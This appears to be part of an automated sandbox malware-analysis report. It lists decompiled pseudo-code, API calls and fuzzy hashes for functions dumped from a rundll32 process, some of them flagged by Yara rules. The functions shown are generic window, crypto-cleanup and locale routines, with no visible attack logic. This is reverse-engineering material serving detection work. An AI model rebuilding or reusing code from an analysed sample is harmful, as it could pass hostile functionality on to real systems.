                          • API String ID: 1752724394-0
                          • Opcode ID: 1c7913baa901df951d4411b80f452d1d68d0700da7330b5db3f0fe2c47c76d83
                          • Instruction ID: 937ffb76e6c599d673b7622ae64a9c81cc5c787ab12892c377c2ecf8b5018f76
                          • Opcode Fuzzy Hash: 1c7913baa901df951d4411b80f452d1d68d0700da7330b5db3f0fe2c47c76d83
                          • Instruction Fuzzy Hash: 26115B72B003059FCB11DFA9D888A9ABBF9EF49710F104669E918CB351DB71EC05CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281CA50 Relevance: 4.5, APIs: 3, Instructions: 30synchronizationthreadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281CA50() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;
				intOrPtr _t7;
				intOrPtr _t12;

				 *0x2865b68 = GetCurrentThreadId();
				while(1) {
					_t5 =  *0x2865b6c; // 0x0
					_t6 = WaitForSingleObject(_t5, 0x64);
					if(_t6 != 0x102) {
						break;
					}
					if( *0x2865b58 != 0) {
						_t7 =  *0x2865b58; // 0x41d1544
						if( *((intOrPtr*)(_t7 + 0x60)) != 0) {
							GetCursorPos( &_v12);
							if(E0282BFA0( &_v12) == 0) {
								_t12 =  *0x2865b58; // 0x41d1544
								E0281F440(_t12);
							}
						}
					}
				}
				return _t6;
			}








                          0x0281ca5b
                          0x0281ca95
                          0x0281ca97
                          0x0281ca9d
                          0x0281caa7
                          0x00000000
                          0x00000000
                          0x0281ca69
                          0x0281ca6b
                          0x0281ca74
                          0x0281ca7a
                          0x0281ca89
                          0x0281ca8b
                          0x0281ca90
                          0x0281ca90
                          0x0281ca89
                          0x0281ca74
                          0x0281ca69
                          0x0281caac

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0281CA56
                          • GetCursorPos.USER32(?), ref: 0281CA7A
                          • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0281CA9D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CurrentCursorObjectSingleThreadWait
                          • String ID:
                          • API String ID: 1359611202-0
                          • Opcode ID: 69715338c17a08c976bc2157aa20e769221f323f6096567c40346544d3fbb185
                          • Instruction ID: f2affaedfa3032fe300b5821e835261882302a21f126ecd150b99e69119068dc
                          • Opcode Fuzzy Hash: 69715338c17a08c976bc2157aa20e769221f323f6096567c40346544d3fbb185
                          • Instruction Fuzzy Hash: 43F0A7FD98020A9AD717EF68E44FB4833AE9700314F544922E114CB0D0EB35A4F0CE16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2D98 Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E042D2D98() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                          0x042d2da4
                          0x042d2daa
                          0x042d2db0
                          0x042d2db0
                          0x042d2dbb
                          0x042d2dc1
                          0x042d2dc7
                          0x042d2dc7
                          0x042d2dd2
                          0x042d2dda
                          0x042d2de0
                          0x042d2de0
                          0x042d2ded

                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: f3c26a3e5551a8971529073e9ae6ce8e92cb75f6764896ddb80ef3e1f8b5655b
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: f3c26a3e5551a8971529073e9ae6ce8e92cb75f6764896ddb80ef3e1f8b5655b
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2D17 Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E042D2D17() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                          0x042d2da4
                          0x042d2daa
                          0x042d2db0
                          0x042d2db0
                          0x042d2dbb
                          0x042d2dc1
                          0x042d2dc7
                          0x042d2dc7
                          0x042d2dd2
                          0x042d2dda
                          0x042d2de0
                          0x042d2de0
                          0x042d2ded

                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: 5eacb5c61257cda172241222458bc2ab4bf51c2eed2149288c39210c5d551447
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: 5eacb5c61257cda172241222458bc2ab4bf51c2eed2149288c39210c5d551447
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2D78 Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E042D2D78() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                          0x042d2da4
                          0x042d2daa
                          0x042d2db0
                          0x042d2db0
                          0x042d2dbb
                          0x042d2dc1
                          0x042d2dc7
                          0x042d2dc7
                          0x042d2dd2
                          0x042d2dda
                          0x042d2de0
                          0x042d2de0
                          0x042d2ded

                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: 9e541a08fb6e71971091022f9210553309fe9f401893bcbc182454819ce603e7
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: 9e541a08fb6e71971091022f9210553309fe9f401893bcbc182454819ce603e7
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2D55 Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E042D2D55() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                          0x042d2da4
                          0x042d2daa
                          0x042d2db0
                          0x042d2db0
                          0x042d2dbb
                          0x042d2dc1
                          0x042d2dc7
                          0x042d2dc7
                          0x042d2dd2
                          0x042d2dda
                          0x042d2de0
                          0x042d2de0
                          0x042d2ded

                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: 6343a0a666bbbe88b8d8dcebb993f9f882f6bfb6d0217034b5e67a8f26c6708b
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: 6343a0a666bbbe88b8d8dcebb993f9f882f6bfb6d0217034b5e67a8f26c6708b
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028330B4 Relevance: 3.1, APIs: 2, Instructions: 63windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E028330B4(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E02833004(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x28645d4; // 0x2865b58
					_t9 =  *_t31 + 0x44; // 0x0
					if(_t37 ==  *_t9) {
						goto L8;
					} else {
						_t34 = E0281381C(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E0282E93C(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}










                          0x028330ba
                          0x028330bd
                          0x028330cf
                          0x0283312d
                          0x0283313d
                          0x0283314c
                          0x00000000
                          0x02833153
                          0x02833142
                          0x0283314a
                          0x00000000
                          0x00000000
                          0x028330fe
                          0x028330fe
                          0x02833105
                          0x02833108
                          0x00000000
                          0x0283310a
                          0x0283310c
                          0x02833111
                          0x02833115
                          0x00000000
                          0x02833117
                          0x02833124
                          0x0283312b
                          0x00000000
                          0x00000000
                          0x0283312b
                          0x02833115
                          0x02833108
                          0x0283315a

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CaptureIconic
                          • String ID:
                          • API String ID: 2277910766-0
                          • Opcode ID: d14a6912e4b4fa7ad87a5d9be8a777b0efcc7409b40e4ca9e08556841ade9ff9
                          • Instruction ID: 5b8bb59c2b8199fe93bcba647d552edba5f504b46ab285e6839123f19c62898f
                          • Opcode Fuzzy Hash: d14a6912e4b4fa7ad87a5d9be8a777b0efcc7409b40e4ca9e08556841ade9ff9
                          • Instruction Fuzzy Hash: DF113A7EB002059BDB22DB5CD984AADB3F9AF04344B2450A5F528EB251EB34ED409BD4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028182CC Relevance: 3.1, APIs: 2, Instructions: 53nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 66%
                          			E028182CC(int __eax, int* __edx) {
				int _v8;
				int* _v12;
				int _t29;

				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x254) == 0) {
					_t29 = E02831AF4(_v8, _v12);
				} else {
					if( *_v12 != 5) {
						_t29 = DefFrameProcA(E02833F7C(_v8),  *(_v8 + 0x254),  *_v12, _v12[1], _v12[2]);
						_v12[3] = _t29;
					} else {
						_push(_v12[2]);
						_push(_v12[1]);
						_push( *_v12);
						_t29 = E02833F7C(_v8);
						_push(_t29);
						L027D6A3C();
						_v12[3] = _t29;
					}
				}
				return _t29;
			}






                          0x028182d2
                          0x028182d5
                          0x028182e2
                          0x02818350
                          0x028182e4
                          0x028182ea
                          0x0281833d
                          0x02818345
                          0x028182ec
                          0x028182f2
                          0x028182f9
                          0x028182ff
                          0x02818303
                          0x02818308
                          0x02818309
                          0x02818311
                          0x02818311
                          0x028182ea
                          0x02818358

                          APIs
                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?), ref: 02818309
                          • DefFrameProcA.USER32(00000000,00000000,?,?,?), ref: 0281833D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FrameNtdllProcProc_Window
                          • String ID:
                          • API String ID: 3758719113-0
                          • Opcode ID: 6b2f9f32df56627f98f7c04bf588bcdf0eb1e58db3c603e50a0334012dc81695
                          • Instruction ID: d2c782cff42f8335364d647f382eac5d1f487bde683a7bc937e8ee3751142825
                          • Opcode Fuzzy Hash: 6b2f9f32df56627f98f7c04bf588bcdf0eb1e58db3c603e50a0334012dc81695
                          • Instruction Fuzzy Hash: 08114279A04208EFDB40DB9CC985E9DBBF9AB48320F198190E549EB361D730EE80DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F883C Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E027F883C(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x27f88d8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E027F87E8(_t22);
				} else {
					E027D4358( &_v264, 0x100,  &_v260);
					E027DBBC4(_v264, 1);
					E027D3A9C();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x27f88df);
				return E027D40E8( &_v264);
			}









                          0x027f8848
                          0x027f8850
                          0x027f8851
                          0x027f8856
                          0x027f8859
                          0x027f8861
                          0x027f8865
                          0x027f88ba
                          0x027f888b
                          0x027f889c
                          0x027f88ae
                          0x027f88b3
                          0x027f88b3
                          0x027f88c1
                          0x027f88c4
                          0x027f88c7
                          0x027f88d7

                          APIs
                          • GetLastError.KERNEL32(00000000,027F88D8), ref: 027F885C
                          • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,027F88D8), ref: 027F8882
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 5a7a30df3cd2b51a6babb44e60a398ef70454d07715362429f90dcf9ed4e5bf5
                          • Instruction ID: ee775fc8b030a4c986050b800b7c53348eef9f437b8c35fff438ea51e123608f
                          • Opcode Fuzzy Hash: 5a7a30df3cd2b51a6babb44e60a398ef70454d07715362429f90dcf9ed4e5bf5
                          • Instruction Fuzzy Hash: A801F7713182095BF752EB64CC92BDA73BEDB48700F8140B1EB44A6380DBB0AD808E26
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02815EA0 Relevance: 3.0, APIs: 2, Instructions: 38windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02815EA0(long __eax, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				char* _t12;
				long _t15;
				long _t19;

				_v12 = __edx;
				_v8 = __eax;
				_t12 =  *0x28644d4; // 0x2865b98
				if( *_t12 == 0) {
					_t15 = IsIconic(E02833F7C(_v8));
					if(_t15 != 0) {
						_t15 =  *((intOrPtr*)( *_v8 + 0x7c))();
					}
				} else {
					_t15 = E02834254(_v8);
					if(_t15 != 0) {
						_t15 = _v8;
						if( *((char*)(_t15 + 0x229)) != 3) {
							_t19 = E02818B60(_v8);
							_t15 = SendMessageA(E02833F7C(_v8), 0x80, 1, _t19);
						}
					}
				}
				return _t15;
			}








                          0x02815ea6
                          0x02815ea9
                          0x02815eac
                          0x02815eb4
                          0x02815ef7
                          0x02815efe
                          0x02815f05
                          0x02815f05
                          0x02815eb6
                          0x02815eb9
                          0x02815ec0
                          0x02815ec2
                          0x02815ecc
                          0x02815ed1
                          0x02815ee7
                          0x02815ee7
                          0x02815ecc
                          0x02815ec0
                          0x02815f0b

                          APIs
                          • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 02815EE7
                          • IsIconic.USER32(00000000), ref: 02815EF7
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: IconicMessageSend
                          • String ID:
                          • API String ID: 3972539302-0
                          • Opcode ID: 2b4e3f0885e9eb37a8fc44de7bd93f5683866b9936bff66d8b5a59b6d3828a81
                          • Instruction ID: 64337ca45e74130f282471b2d9a91e85811e726cdd73c75f42f774a5f01a4502
                          • Opcode Fuzzy Hash: 2b4e3f0885e9eb37a8fc44de7bd93f5683866b9936bff66d8b5a59b6d3828a81
                          • Instruction Fuzzy Hash: 4CF01D7C914208AFDB11EB68D949B9DBBBAAF45304F944090E404EB6D1DB35AE40DB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DCA44 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                          Download Yara Rule
                          C-Code - Quality: 46%
                          			E027DCA44(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x27dcaa8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E027D4358( &_v16, 7,  &_v11);
				_push(_v16);
				E027D8620(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E027DCAAF);
				return E027D40E8( &_v16);
			}








                          0x027dca44
                          0x027dca4d
                          0x027dca52
                          0x027dca53
                          0x027dca58
                          0x027dca5b
                          0x027dca6a
                          0x027dca7a
                          0x027dca82
                          0x027dca8b
                          0x027dca94
                          0x027dca97
                          0x027dca9a
                          0x027dcaa7

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027DCAA8), ref: 027DCA6A
                          • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,027DCAA8), ref: 027DCA83
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 747d82e04d2ddf06a805f9c28f139bd439af4f1858bf01dc1c4dc9718869fea6
                          • Instruction ID: 9a2ad073907b6be184d5573ab4acb5cba2593b333ab154d732d8b62e44d1b6bc
                          • Opcode Fuzzy Hash: 747d82e04d2ddf06a805f9c28f139bd439af4f1858bf01dc1c4dc9718869fea6
                          • Instruction Fuzzy Hash: 80F0F075E043086FEB06EFA1DC5498EB7BFEBC8710F40C4B5A220E7680EA7465008A94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282EA08 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0282EA08(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0282D2F0(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x28645d4; // 0x2865b58
								E0281F26C( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E027D3408(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x2865b94; // 0x41d1124
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x2865b94; // 0x41d1124
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x2865b94; // 0x41d1124
								_t25 = _t90 + 0x1c; // 0x0
								__eflags =  *_t79 -  *_t25;
								if( *_t79 !=  *_t25) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E0281370C( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E027D3408(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E0281381C(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E0281381C(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                          0x0282ea14
                          0x0282ea16
                          0x0282ea1c
                          0x0282ea54
                          0x0282ea54
                          0x0282ea5b
                          0x0282ea94
                          0x0282ea96
                          0x0282ea9b
                          0x0282eb73
                          0x0282eb73
                          0x0282eb78
                          0x0282eb85
                          0x0282eb85
                          0x0282eb8a
                          0x00000000
                          0x0282eb90
                          0x0282eaa1
                          0x0282eaa6
                          0x00000000
                          0x00000000
                          0x0282eaac
                          0x0282eab0
                          0x0282eac6
                          0x0282eac8
                          0x0282eac8
                          0x0282eacd
                          0x0282eada
                          0x0282eadc
                          0x0282eae5
                          0x00000000
                          0x0282eae5
                          0x0282eacf
                          0x0282eacf
                          0x0282ead0
                          0x0282eaef
                          0x0282eaef
                          0x0282eaf3
                          0x0282eb05
                          0x00000000
                          0x0282eb05
                          0x00000000
                          0x0282eafb
                          0x0282ead2
                          0x0282ead2
                          0x0282ead3
                          0x0282eb0c
                          0x00000000
                          0x0282eb0c
                          0x0282ead5
                          0x0282ead6
                          0x00000000
                          0x00000000
                          0x0282eb13
                          0x0282eb18
                          0x0282eb1c
                          0x00000000
                          0x0282eb1e
                          0x0282eb1e
                          0x0282eb23
                          0x0282eb27
                          0x00000000
                          0x00000000
                          0x0282eb2b
                          0x0282eb31
                          0x0282eb31
                          0x0282eb34
                          0x00000000
                          0x00000000
                          0x0282eb3d
                          0x0282eb44
                          0x0282eb52
                          0x0282eb59
                          0x0282eb60
                          0x00000000
                          0x0282eb6c
                          0x00000000
                          0x0282eb1c
                          0x0282eab2
                          0x0282eab2
                          0x0282eab7
                          0x0282eac3
                          0x0282eac3
                          0x0282eac3
                          0x00000000
                          0x0282eac3
                          0x0282eab9
                          0x0282eab9
                          0x0282eabc
                          0x00000000
                          0x00000000
                          0x0282eabe
                          0x0282eac1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0282eac1
                          0x0282ea6b
                          0x0282ea72
                          0x00000000
                          0x00000000
